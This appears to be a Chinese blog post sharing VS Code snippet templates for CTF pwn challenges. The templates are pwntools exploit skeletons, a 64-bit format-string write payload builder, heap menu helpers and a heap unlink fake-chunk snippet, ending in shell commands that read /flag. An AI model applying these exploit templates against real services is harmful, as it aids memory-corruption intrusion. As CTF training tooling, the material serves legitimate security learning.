模板说明

代码格式为code-snippets,可以直接复制代码命名为XXX.code-snippets,然后导入到VScode。导入方式这里只提供最简单的一种,依次使用”档案”->”喜好设定”->”使用者程式码片段”(此处与语言包有关,这里示例使用的语言包为”中文(繁体)”),然后点击”新增全域程式码片段档案”,记住弹出的对话框的保存目录(Ubuntu16.04默认路径为~/.config/Code/User/snippets),最后将XXX.code-snippets复制到该目录下,重启VScode即可。

一般模板

代码格式:code-snippets,推荐命名:Pwn.code-snippets,触发词:pwn

{
    // Place your global snippets here. Each snippet is defined under a snippet name and has a scope, prefix, body and 
    // description. Add comma separated ids of the languages where the snippet is applicable in the scope field. If scope 
    // is left empty or omitted, the snippet gets applied to all languages. The prefix is what is 
    // used to trigger the snippet and the body will be expanded and inserted. Possible variables are: 
    // $1, $2 for tab stops, $0 for the final cursor position, and ${1:label}, ${2:another} for placeholders. 
    // Placeholders with the same ids are connected.
    // Example:
    // "Print to console": {
    //  "scope": "javascript,typescript",
    //  "prefix": "log",
    //  "body": [
    //  "console.log('$1');",
    //  "$2"
    //  ],
    //  "description": "Log output to console"
    // }
    "Print to console": {
    "scope": "python",
    "prefix": "pwn",
    "body": [
        "from pwn import *",
        "import sys",
        "context.log_level='debug'",
        "# context.arch='amd64'",
        "# context.arch='i386'",
        "",
        "file_name=ELF('')",
        "",
        "if context.arch == amd64:",
        "    libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")",
        "elif context.arch == i386:",
        "    libc=ELF("/lib/i386-linux-gnu/libc.so.6")",
        "",
        "def get_sh(other_libc = null):",
        "    global libc",
        "    if args['REMOTE']:",
        "        if other_libc is not null:",
        "            libc = ELF("./")",
        "        return remote(sys.argv[1], sys.argv[2])",
        "    else:",
        "        return process("./")",
        "",
        "def get_address(sh,info=null,start_string=null,end_string=null,int_mode=False):",
        "    sh.recvuntil(start_string)",
        "    if int_mode :",
        "        return_address=int(sh.recvuntil(end_string).strip(end_string),16)",
        "    elif context.arch == 'amd64':",
        "        return_address=u64(sh.recvuntil(end_string).strip(end_string).ljust(8,'\x00'))",
        "    else:",
        "        return_address=u32(sh.recvuntil(end_string).strip(end_string).ljust(4,'\x00'))",
        "    log.success(info+str(hex(return_address)))",
        "    return return_address",
        "",
        "def get_flag(sh):",
        "    # sh.recv()",
        "    sh.sendline('ls')",
        "    sh.recv()",
        "    sh.sendline('cat /flag')",
        "    return sh.recvline()",
        "",
        "def get_gdb(sh,stop=False):",
        "    gdb.attach(sh)",
        "    if stop :",
        "        raw_input()",
        "",
        "if __name__ == "__main__":",
        "    sh = get_sh()",
        "    get_gdb(sh)",
        "    sh.sendline(payload)",
        "    sh.interactive()",
        "    # sh.recvuntil('')",
        "    flag=get_flag(sh)",
        "    log.success('The flag is '+flag)",
    ],
    "description": "solve pwn problems!"
    }
}

模板效果

from pwn import *
import sys
context.log_level='debug'
# context.arch='amd64'
# context.arch='i386'

file_name=ELF('')

if context.arch == amd64:
    libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
elif context.arch == i386:
    libc=ELF("/lib/i386-linux-gnu/libc.so.6")

def get_sh(other_libc = null):
    global libc
    if args['REMOTE']:
        if other_libc is not null:
            libc = ELF("./")
        return remote(sys.argv[1], sys.argv[2])
    else:
        return process("./")

def get_address(sh,info=null,start_string=null,end_string=null,int_mode=False):
    sh.recvuntil(start_string)
    if int_mode :
        return_address=int(sh.recvuntil(end_string).strip(end_string),16)
    elif context.arch == 'amd64':
        return_address=u64(sh.recvuntil(end_string).strip(end_string).ljust(8,'\x00'))
    else:
        return_address=u32(sh.recvuntil(end_string).strip(end_string).ljust(4,'\x00'))
    log.success(info+str(hex(return_address)))
    return return_address

def get_flag(sh):
    # sh.recv()
    sh.sendline('ls')
    sh.recv()
    sh.sendline('cat /flag')
    return sh.recvline()

def get_gdb(sh,stop=False):
    gdb.attach(sh)
    if stop :
        raw_input()

if __name__ == "__main__":
    sh = get_sh()
    get_gdb(sh)
    sh.sendline(payload)
    sh.interactive()
    # sh.recvuntil('')
    flag=get_flag(sh)
    log.success('The flag is '+flag)

格式化字符串模板

代码格式:code-snippets,推荐命名:Pwn_fmt.code-snippets,触发词:pwn_fmt

{
    // Place your global snippets here. Each snippet is defined under a snippet name and has a scope, prefix, body and 
    // description. Add comma separated ids of the languages where the snippet is applicable in the scope field. If scope 
    // is left empty or omitted, the snippet gets applied to all languages. The prefix is what is 
    // used to trigger the snippet and the body will be expanded and inserted. Possible variables are: 
    // $1, $2 for tab stops, $0 for the final cursor position, and ${1:label}, ${2:another} for placeholders. 
    // Placeholders with the same ids are connected.
    // Example:
    // "Print to console": {
    //  "scope": "javascript,typescript",
    //  "prefix": "log",
    //  "body": [
    //  "console.log('$1');",
    //  "$2"
    //  ],
    //  "description": "Log output to console"
    // }
    "Print to console": {
    "scope": "python",
    "prefix": "pwn_fmt",
    "body": [
        "from pwn import *",
        "import sys",
        "context.log_level='debug'",
        "# context.arch='amd64'",
        "# context.arch='i386'",
        "",
        "file_name=ELF('')",
        "",
        "if context.arch == amd64:",
        "    libc=ELF(\"/lib/x86_64-linux-gnu/libc.so.6\")",
        "elif context.arch == i386:",
        "    libc=ELF(\"/lib/i386-linux-gnu/libc.so.6\")",
        "",
        "def get_sh(other_libc = null):",
        "    global libc",
        "    if args['REMOTE']:",
        "        if other_libc is not null:",
        "            libc = ELF(\"./\")",
        "        return remote(sys.argv[1], sys.argv[2])",
        "    else:",
        "        return process(\"./\")",
        "",
        "def get_address(sh,info=null,start_string=null,end_string=null,int_mode=False):",
        "    sh.recvuntil(start_string)",
        "    if int_mode :",
        "        return_address=int(sh.recvuntil(end_string).strip(end_string),16)",
        "    elif context.arch == 'amd64':",
        "        return_address=u64(sh.recvuntil(end_string).strip(end_string).ljust(8,'\\x00'))",
        "    else:",
        "        return_address=u32(sh.recvuntil(end_string).strip(end_string).ljust(4,'\\x00'))",
        "    log.success(info+str(hex(return_address)))",
        "    return return_address",
        "",
        "def get_flag(sh):",
        "    # sh.recv()",
        "    sh.sendline('ls')",
        "    sh.recv()",
        "    sh.sendline('cat /flag')",
        "    return sh.recvline()",
        "",
        "def get_gdb(sh,stop=False):",
        "    gdb.attach(sh)",
        "    if stop :",
        "        raw_input()",
        "",
        "def fmt(prev , target):",
        "    if prev < target:",
        "        result = target - prev",
        "        return \"%\" + str(result)  + \"c\"",
        "    elif prev == target:",
        "        return \"\"",
        "    else:",
        "        result = 0x10000 + target - prev",
        "        return \"%\" + str(result) + \"c\"",
        "",
        "def fmt64(offset , target_addr , target_value , prev = 0):",
        "    payload = \"\"",
        "    for i in range(3):",
        "        payload += p64(target_addr + i * 2)",
        "    payload2 = \"\"",
        "    for i in range(3):",
        "        target = (target_value >> (i * 16)) & 0xffff ",
        "        payload2 += fmt(prev , target) + \"%\" + str(offset + 8 + i) + \"hn\"",
        "        prev = target",
        "    payload = payload2.ljust(0x40 , \"a\") + payload",
        "    return payload",
        "",
        "def exec_fmt(payload):",
        "    sh = get_sh()",
        "    sh.recvuntil(\"\")",
        "    sh.sendline(payload)",
        "    # sh.recvline()",
        "    info = sh.recv()",
        "    sh.close()",
        "    return info",
        "",
        "if __name__ == \"__main__\":",
        "    log.info('Now,test format string position...')",
        "    autofmt = FmtStr(exec_fmt)",
        "    print(autofmt.offset)",
        "",
        "    sh=get_sh()",
        "    payload=fmt64(format_string_position , Address , Value )",
        "    # payload=fmtstr_payload(format_string_position, {Address: Value})",
        "    sh.recvuntil(\"\")",
        "    # gdb.attach(sh)",
        "    sh.sendline(payload)",
        "    sh.interactive()",
        "    print(sh.recv())",     
    ],
    "description": "Pwn to fmt!"
    }
}

模板效果

from pwn import *
import sys
context.log_level='debug'
# context.arch='amd64'
# context.arch='i386'

file_name=ELF('')

if context.arch == amd64:
    libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
elif context.arch == i386:
    libc=ELF("/lib/i386-linux-gnu/libc.so.6")

def get_sh(other_libc = null):
    global libc
    if args['REMOTE']:
        if other_libc is not null:
            libc = ELF("./")
        return remote(sys.argv[1], sys.argv[2])
    else:
        return process("./")

def get_address(sh,info=null,start_string=null,end_string=null,int_mode=False):
    sh.recvuntil(start_string)
    if int_mode :
        return_address=int(sh.recvuntil(end_string).strip(end_string),16)
    elif context.arch == 'amd64':
        return_address=u64(sh.recvuntil(end_string).strip(end_string).ljust(8,'\x00'))
    else:
        return_address=u32(sh.recvuntil(end_string).strip(end_string).ljust(4,'\x00'))
    log.success(info+str(hex(return_address)))
    return return_address

def get_flag(sh):
    # sh.recv()
    sh.sendline('ls')
    sh.recv()
    sh.sendline('cat /flag')
    return sh.recvline()

def get_gdb(sh,stop=False):
    gdb.attach(sh)
    if stop :
        raw_input()

def fmt(prev , target):
    if prev < target:
        result = target - prev
        return "%" + str(result)  + "c"
    elif prev == target:
        return ""
    else:
        result = 0x10000 + target - prev
        return "%" + str(result) + "c"

def fmt64(offset , target_addr , target_value , prev = 0):
    payload = ""
    for i in range(3):
        payload += p64(target_addr + i * 2)
    payload2 = ""
    for i in range(3):
        target = (target_value >> (i * 16)) & 0xffff 
        payload2 += fmt(prev , target) + "%" + str(offset + 8 + i) + "hn"
        prev = target
    payload = payload2.ljust(0x40 , "a") + payload
    return payload

def exec_fmt(payload):
    sh = get_sh()
    sh.recvuntil("")
    sh.sendline(payload)
    # sh.recvline()
    info = sh.recv()
    sh.close()
    return info

if __name__ == "__main__":
    log.info('Now,test format string position...')
    autofmt = FmtStr(exec_fmt)
    print(autofmt.offset)

    sh=get_sh()
    payload=fmt64(format_string_position , Address , Value )
    # payload=fmtstr_payload(format_string_position, {Address: Value})
    sh.recvuntil("")
    # gdb.attach(sh)
    sh.sendline(payload)
    sh.interactive()
    print(sh.recv())

一般堆利用模板

代码格式:code-snippets,推荐命名:Pwn_heap.code-snippets,触发词:heap_func

{
    // Place your global snippets here. Each snippet is defined under a snippet name and has a scope, prefix, body and 
    // description. Add comma separated ids of the languages where the snippet is applicable in the scope field. If scope 
    // is left empty or omitted, the snippet gets applied to all languages. The prefix is what is 
    // used to trigger the snippet and the body will be expanded and inserted. Possible variables are: 
    // $1, $2 for tab stops, $0 for the final cursor position, and ${1:label}, ${2:another} for placeholders. 
    // Placeholders with the same ids are connected.
    // Example:
    // "Print to console": {
    //  "scope": "javascript,typescript",
    //  "prefix": "log",
    //  "body": [
    //      "console.log('$1');",
    //      "$2"
    //  ],
    //  "description": "Log output to console"
    // }
    "Print to console": {
        "scope": "python",
        "prefix": "heap_func",
        "body": [
            "def creat(sh,chunk_size,value):",
            "    sh.recvuntil('')",
            "    sh.sendline('')",
            "    sh.recvuntil('')",
            "    sh.sendline(str(chunk_size))",
            "    sh.recvuntil('')",
            "    sh.sendline(value)",
            "",
            "def delete(sh,index):",
            "    sh.recvuntil('')",
            "    sh.sendline('')",
            "    sh.recvuntil('')",
            "    sh.sendline(str(index))",
            "",
            "def show(sh,index):",
            "    sh.recvuntil('')",
            "    sh.sendline('')",
            "    sh.recvuntil('')",
            "    sh.sendline(str(index))",
            "",
            "def edit(sh,index,value):",
            "    sh.recvuntil('')",
            "    sh.sendline('')",
            "    sh.recvuntil('')",
            "    sh.sendline(str(index))",
            "    sh.recvuntil('')",
            "    sh.sendline(value)",
            "",
        ],
        "description": "Pwn to heap function"
    }   
}

模板效果——向利用脚本添加堆利用函数

def creat(sh,chunk_size,value):
    sh.recvuntil('')
    sh.sendline('')
    sh.recvuntil('')
    sh.sendline(str(chunk_size))
    sh.recvuntil('')
    sh.sendline(value)

def delete(sh,index):
    sh.recvuntil('')
    sh.sendline('')
    sh.recvuntil('')
    sh.sendline(str(index))

def show(sh,index):
    sh.recvuntil('')
    sh.sendline('')
    sh.recvuntil('')
    sh.sendline(str(index))

def edit(sh,index,value):
    sh.recvuntil('')
    sh.sendline('')
    sh.recvuntil('')
    sh.sendline(str(index))
    sh.recvuntil('')
    sh.sendline(value)

Unlink利用模板

代码格式:code-snippets,推荐命名:Pwn_heap_unlink.code-snippets,触发词:unlink_code

{
    // Place your global snippets here. Each snippet is defined under a snippet name and has a scope, prefix, body and 
    // description. Add comma separated ids of the languages where the snippet is applicable in the scope field. If scope 
    // is left empty or omitted, the snippet gets applied to all languages. The prefix is what is 
    // used to trigger the snippet and the body will be expanded and inserted. Possible variables are: 
    // $1, $2 for tab stops, $0 for the final cursor position, and ${1:label}, ${2:another} for placeholders. 
    // Placeholders with the same ids are connected.
    // Example:
    // "Print to console": {
    //  "scope": "javascript,typescript",
    //  "prefix": "log",
    //  "body": [
    //      "console.log('$1');",
    //      "$2"
    //  ],
    //  "description": "Log output to console"
    // }
    "Print to console": {
        "scope": "python",
        "prefix": "pwn_heap_unlink",
        "body": [
            "target_addr=",
            "fd=target_addr - 0x18",
            "bk=target_addr - 0x10",
            "fake_chunk='a'*0x8 # prev_size",
            "fake_chunk+=p64() # size",
            "fake_chunk+=p64(fd)+p64(bk)",
            "fake_chunk+='a'* #padding",
            "",
        ],
        "description": "Pwn to heap unlink code"
    }   
}

模板效果——向利用脚本添加Unlink计算片段

target_addr=
fd=target_addr - 0x18
bk=target_addr - 0x10
fake_chunk='a'*0x8 # prev_size
fake_chunk+=p64() # size
fake_chunk+=p64(fd)+p64(bk)
fake_chunk+='a'* #padding
分类: CTF

0 条评论

发表评论

电子邮件地址不会被公开。 必填项已用*标注